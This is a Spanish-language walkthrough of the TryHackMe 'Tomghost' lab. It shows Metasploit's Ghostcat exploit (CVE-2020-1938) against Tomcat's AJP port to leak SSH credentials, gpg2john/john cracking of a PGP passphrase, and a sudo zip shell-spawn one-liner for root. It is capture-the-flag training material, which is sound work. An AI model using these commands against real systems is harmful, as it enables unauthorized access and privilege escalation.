Entrada

TryHackMe - Tomghost

¿Cómo obtener las credenciales usando la clave PGP?

Publicado
Preview Image
Por René Bui
3 min de lectura
TryHackMe - Tomghost

Introducción

Una sala bastante sólida en la que he aprendido mucho. Descifrar la clave pgp con gpg2john y obtener las credenciales de usuario de esta manera + obtener el privilegio root con zip, muy interesante.

Tryhackme Room Link

Nmap

Comencemos con el escaneo de nmap:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

nmap -T4 -n -sC -sV -Pn -p- 10.10.56.163
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f3:c8:9f:0b:6a:c5:fe:95:54:0b:e9:e3:ba:93:db:7c (RSA)
|   256 dd:1a:09:f5:99:63:a3:43:0d:2d:90:d8:e3:e1:1f:b9 (ECDSA)
|_  256 48:d1:30:1b:38:6c:c6:53:ea:30:81:80:5d:0c:f1:05 (ED25519)
53/tcp   open  tcpwrapped
8009/tcp open  ajp13      Apache Jserv (Protocol v1.3)
| ajp-methods: 
|_  Supported methods: GET HEAD POST OPTIONS
8080/tcp open  http       Apache Tomcat 9.0.30
|_http-title: Apache Tomcat/9.0.30
|_http-favicon: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Así que tenemos 4 puertos abiertos 22/tcp 53/tcp 8009/tcp 8080/tcp

Reconocimiento

Después de una rápida búsqueda en Google de vulnerabilidades de Tomcat , encontramos lo siguiente: En abril de 2020 se informó que las vulnerabilidades `CVE-2020-1938` y `CVE-2020-1745` afectan al conector AJP de Apache Tomcat y que sufren un ataque de tipo "Inyección de solicitud" (Ghostcat)

Acceso inicial

Vamos a cargar metasploit para esto

1

msfconsole

1
2
3
4
5
6
7
8
9
10
11
12

search cve: CVE-2020-1938
msf6 > search cve: CVE-2020-1938

Matching Modules
================

   #  Name                                  Disclosure Date  Rank    Check  Description
   -  ----                                  ---------------  ----    -----  -----------
   0  auxiliary/admin/http/tomcat_ghostcat  2020-02-20       normal  Yes    Apache Tomcat AJP File Read


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/admin/http/tomcat_ghostcat

Parece que podemos usar este módulo

1
2

use auxiliary/admin/http/tomcat_ghostcat
msf6 auxiliary(admin/http/tomcat_ghostcat) >

Ahora veamos qué opciones necesitamos configurar

1
2
3
4
5
6
7
8
9
10
11

msf6 auxiliary(admin/http/tomcat_ghostcat) > options

Module options (auxiliary/admin/http/tomcat_ghostcat):

   Name      Current Setting   Required  Description
   ----      ---------------   --------  -----------
   FILENAME  /WEB-INF/web.xml  yes       File name
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/u
                                         sing-metasploit.html
   RPORT     8009              yes       The Apache JServ Protocol (AJP) port (TCP)

Entonces solo necesitamos configurar RHOSTS (IP del host remoto) y ejecutar el exploit

1
2
3

msf6 auxiliary(admin/http/tomcat_ghostcat) > set RHOSTS 10.10.56.163
RHOSTS => 10.10.56.163
msf6 auxiliary(admin/http/tomcat_ghostcat) > exploit

1
2
3

     Welcome to GhostCat
        skyfuck:8730281lkjlkjdqlksalks
  </description>

Estas parecen ser credenciales, así que probémoslas para conectarnos a través de ssh

1
2

ssh skyfuck@10.10.56.163
skyfuck@ubuntu:~$

Bandera de usuario

Ok, en realidad podemos obtener la bandera del usuario en el directorio /home/merlin

User Flag

Bandera Root

Ahora podemos ver 2 archivos

1
2

skyfuck@ubuntu:~$ ls
credential.pgp  tryhackme.asc

Necesitamos obtener las credenciales

1
2
3
4
5
6
7
8
9

skyfuck@ubuntu:~$ gpg --import tryhackme.asc
gpg: key C6707170: secret key imported
gpg: key C6707170: public key "tryhackme <stuxnet@tryhackme.com>" imported
gpg: key C6707170: "tryhackme <stuxnet@tryhackme.com>" not changed
gpg: Total number processed: 2
gpg:               imported: 1
gpg:              unchanged: 1
gpg:       secret keys read: 1
gpg:   secret keys imported: 1

1
2
3
4
5
6
7
8

skyfuck@ubuntu:~$ gpg --decrypt credential.pgp

You need a passphrase to unlock the secret key for
user: "tryhackme <stuxnet@tryhackme.com>"
1024-bit ELG-E key, ID 6184FBCC, created 2020-03-11 (main key ID C6707170)

gpg: gpg-agent is not available in this session
Enter passphrase:

Necesitaremos una contraseña para esto

Descarguemos los archivos disponibles

1

scp skyfuck@10.10.56.163:/home/skyfuck/* /home/rene/Desktop/

Y usemos gpg2john para descifrar el archivo tryhackme.asc

1
2

gpg2john tryhackme.asc > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash

Passphrase

Ahora usemos la frase de contraseña para obtener el hash del archivo credential.pgp

Passphrase

Ahora usemos nuestras nuevas credenciales para iniciar sesión como merlin

1
2

└─$ ssh merlin@10.10.56.163                                 
merlin@10.10.56.163's password:

1
2
3
4
5
6

merlin@ubuntu:~$ sudo -l
Matching Defaults entries for merlin on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User merlin may run the following commands on ubuntu:
    (root : root) NOPASSWD: /usr/bin/zip

Ahora somos el nuevo usuario y podemos tener acceso root a zip, lo que significa que necesitamos crear un archivo y comprimirlo.

Después de una búsqueda rápida en Google, podemos usar la técnica de escalada de privilegios existente

1
2
3

TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
sudo rm $TF

Y obtenemos una bandera raíz

Root

TryHackMe
web linux privilege escalation
Esta entrada está licenciada bajo CC BY 4.0 por el autor.